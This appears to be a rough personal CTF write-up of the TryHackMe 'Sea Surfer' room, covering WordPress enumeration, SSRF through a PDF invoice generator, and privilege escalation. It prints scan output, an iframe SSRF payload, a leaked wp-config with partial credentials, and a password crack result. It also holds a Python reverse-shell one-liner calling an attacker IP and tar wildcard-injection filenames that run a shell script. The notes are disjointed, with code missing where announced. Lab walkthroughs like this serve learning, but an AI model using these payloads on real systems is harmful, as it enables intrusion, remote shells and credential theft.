tryhackme
// 2026-01-07
// ID: REF-Sea Surfer
Sea Surfer
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 af:1d:f3:33:3d:8c:6e:f4:28:65:ec:63:3a:b4:3d:1e (RSA)
| 256 54:b1:1a:c6:4b:bc:e0:b1:71:e3:26:d7:31:4a:d1:4c (ECDSA)
|_ 256 b1:be:5a:81:d1:84:58:fb:e9:79:2a:00:fd:e0:5f:ce (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://seasurfer.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://seasurfer.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://seasurfer.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://seasurfer.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.9.3 identified (Insecure, released on 2022-04-05).
| Found By: Rss Generator (Passive Detection)
| - http://seasurfer.thm/feed/, <generator>https://wordpress.org/?v=5.9.3</generator>
| - http://seasurfer.thm/comments/feed/, <generator>https://wordpress.org/?v=5.9.3</generator>
|
| [!] 34 vulnerabilities identified:
|
| [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
| Fixed in: 5.9.4
| References:
| - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
| Fixed in: 5.9.4
| References:
| - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - SQLi via Link API
| Fixed in: 5.9.4
| References:
| - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
|
| [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
|
| [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
|
| [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
|
| [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
|
| [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
|
| [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
|
| [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
|
| [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
|
| [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
|
| [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
|
| [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
| Fixed in: 5.9.5
| References:
| - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/gutenberg/pull/45045/files
|
| [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
| References:
| - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
|
| [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
| Fixed in: 5.9.6
| References:
| - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
| Fixed in: 5.9.6
| References:
| - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
| Fixed in: 5.9.6
| References:
| - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
| Fixed in: 5.9.7
| References:
| - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
| - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Content Injection
| Fixed in: 5.9.6
| References:
| - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
| Fixed in: 5.9.8
| References:
| - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
| - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
| Fixed in: 5.9.9
| References:
| - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
| Fixed in: 5.9.9
| References:
| - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 5.9.10
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 5.9.10
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 5.9.10
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WP < 6.8.3 - Author+ DOM Stored XSS
| Fixed in: 5.9.12
| References:
| - https://wpscan.com/vulnerability/c4616b57-770f-4c40-93f8-29571c80330a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58674
| - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-cross-site-scripting-xss-vulnerability
| - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/
|
| [!] Title: WP < 6.8.3 - Contributor+ Sensitive Data Disclosure
| Fixed in: 5.9.12
| References:
| - https://wpscan.com/vulnerability/1e2dad30-dd95-4142-903b-4d5c580eaad2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58246
| - https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-wordpress-wordpress-6-8-2-sensitive-data-exposure-vulnerability
| - https://wordpress.org/news/2025/09/wordpress-6-8-3-release/
[+] WordPress theme in use: twentyseventeen
| Location: http://seasurfer.thm/wp-content/themes/twentyseventeen/
| Last Updated: 2025-12-03T00:00:00.000Z
| Readme: http://seasurfer.thm/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 4.0
| Style URL: http://seasurfer.thm/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - http://seasurfer.thm/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.9'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] team-members
| Location: http://seasurfer.thm/wp-content/plugins/team-members/
| Last Updated: 2025-11-03T20:05:00.000Z
| [!] The version is out of date, the latest version is 5.4.1
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: Team Members < 5.1.1 - Admin+ Stored Cross-Site Scripting
| Fixed in: 5.1.1
| References:
| - https://wpscan.com/vulnerability/88328d17-ffc9-4b94-8b01-ad2fd3047fbc
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1568
|
| [!] Title: Team Members < 5.2.1 - Editor+ Stored XSS
| Fixed in: 5.2.1
| References:
| - https://wpscan.com/vulnerability/921daea1-a06d-4310-8bd9-4db32605e500
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3936
|
| [!] Title: Team Members < 5.3.2 - Author+ Stored XSS
| Fixed in: 5.3.2
| References:
| - https://wpscan.com/vulnerability/b2bac900-3d8f-406c-b03d-c8db156acc59
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1331
|
| [!] Title: Team Members < 5.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 5.3.4
| References:
| - https://wpscan.com/vulnerability/c97b0913-721f-4de1-9e41-b794f36afc93
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38670
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/655077b2-7152-4fc6-845d-068a5af730bb
|
| [!] Title: Team Members < 5.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 5.3.6
| References:
| - https://wpscan.com/vulnerability/e2aafdcf-b4b4-4a44-9f61-6e6fa108a11f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8440
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/b46c3f25-6879-47b1-9026-4297fdd003b0
|
| Version: 5.1.0 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://seasurfer.thm/wp-content/plugins/team-members/readme.txt
[i] User(s) Identified:
[+] kyle
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://seasurfer.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Oembed API - Author URL (Aggressive Detection)
| - http://seasurfer.thm/wp-json/oembed/1.0/embed?url=http://seasurfer.thm/&format=json
| Rss Generator (Aggressive Detection)
| Author Sitemap (Aggressive Detection)
| - http://seasurfer.thm/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
gobuster dir -u http://seasurfer.thm/ -w /usr/share/seclists/Discovery/Web-Content/big.txt
/! (Status: 301) [Size: 0] [--> http://seasurfer.thm/]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/0 (Status: 301) [Size: 0] [--> http://seasurfer.thm/]
/adminer (Status: 301) [Size: 316] [--> http://seasurfer.thm/adminer/]
/0000 (Status: 301) [Size: 0] [--> http://seasurfer.thm/0000/]
└─$ ffuf -v -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://seasurfer.thm -t 50 -H "Host: FUZZ.seasurfer.thm" -fw 3499
[Status: 200, Size: 3072, Words: 225, Lines: 109, Duration: 603ms]
| URL | http://seasurfer.thm
* FUZZ: internal
<iframe src="http://tun0:1234/>
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.153.193] from (UNKNOWN) [10.64.163.197] 52966
GET /%3E%20%3C/td%3E%3C/tr%3E%3C/table%3E%3C/td%3E%3C/tr%3E%3Ctr%20class= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf Safari/534.34
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://internal.seasurfer.thm/invoice.php?name=kyle&payment=Credit+card&comment=%3Ciframe+src%3D%22http%3A%2F%2F192.168.153.193%3A1234%2F%3E+&item1=&price1=&id=02012026-6BiwgAR7mTfVmjVHlTQS
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en,*
Host: .......
The PDF generator blocks `file://` if you type it directly, but it won't block a URL pointing to your IP. You will host a PHP script that "points" the generator back to its own internal files.
1. **Create the file:** On your attacker machine (Kali), create a file named `surf.php`.
2. **Add the code:**
PHP
Since the goal is to get into the WordPress database, you need to find `wp-config.php`. In a standard Linux installation, it is usually found in:
- `/var/www/html/wp-config.php`
- `/var/www/wordpress/wp-config.php` (The walkthrough confirmed this is the one)
---
## Phase 3: Execute the SSRF-to-LFI
Now, go to the vulnerable website's input field (the comment or name field that gets rendered into the PDF) and inject the following payload:
HTML
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wor.....' );
/** Database username */
define( 'DB_USER', 'wordpr.......' );
/** Database password */
define( 'DB_PASSWORD', 'coolDataTa.....n' );
/** Database hostname */
define( 'DB_HOST', 'localh.t' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all exist
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jenny4ever (?)
1g 0:00:00:20 DONE (2026-01-02 05:14) 0.04916g/s 24656p/s 24656c/s 24656C/s jess1122..jello45
Login into wordpress add reverse shell into theme editor and get shell wia netcat
www-data@ip-10-64-163-197:/var/www/internal/invoices$ echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.193",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")\'' > shell.sh
echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.193",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")\'' > shell.sh
www-data@ip-10-64-163-197:/var/www/internal/invoices$ echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@ip-10-64-163-197:/var/www/internal/invoices$
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.153.193] from (UNKNOWN) [10.64.163.197] 45036
$ cat /home/kyle/user.txt
cat /home/kyle/user.txt
$
to get root priviledge i try different things still cant if you find it mail me whole things
https://github.com/lassidev/writeups/blob/main/TryHackMe/Sea%20Surfer.md
https://github.com/nongiach/sudo_inject.git